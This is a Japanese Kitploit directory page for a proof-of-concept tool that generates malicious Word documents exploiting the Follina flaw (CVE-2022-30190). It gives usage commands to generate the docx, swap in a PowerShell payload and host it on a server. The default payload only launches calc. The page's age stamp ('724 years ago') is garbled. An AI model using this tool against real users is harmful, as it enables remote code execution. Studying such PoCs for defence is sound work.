Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-30190 — MS-MSDT Follina CVE-2022-30190 PoC ドキュメント生成ツール | Kitploit
ツール/GitHubGitHub/sudoaza/cve-2022-30190
ペイロード生成エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubsudoaza/cve-2022-30190

CVE-2022-30190

MS-MSDT Follina CVE-2022-30190 PoC ドキュメント生成ツール

リポジトリを見る
724年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

MS-MSDT Follina CVE-2022-30190 PoC

Microsoft Office Word リモートコード実行を悪用する悪意のある docx ジェネレーター

このスクリプトは、LockedByte による CVE-2021-40444 PoC と Tothi による writeup に基づいています。

使用方法

まず backup.html を修正し、PowerShell ペイロードを置き換えてください。現在は、IEX('calc.exe') を使用して calc.exe を起動するだけです。

python3 exploit.py generate http://<SRV IP>

ドキュメント生成

悪意のある docx を生成したら(out/ に生成されます)、サーバーをセットアップできます:

sudo python3 exploit.py host 80

サーバー

最後に、Windows 仮想マシンで docx を試してください:

Calc の起動

ツールをダウンロード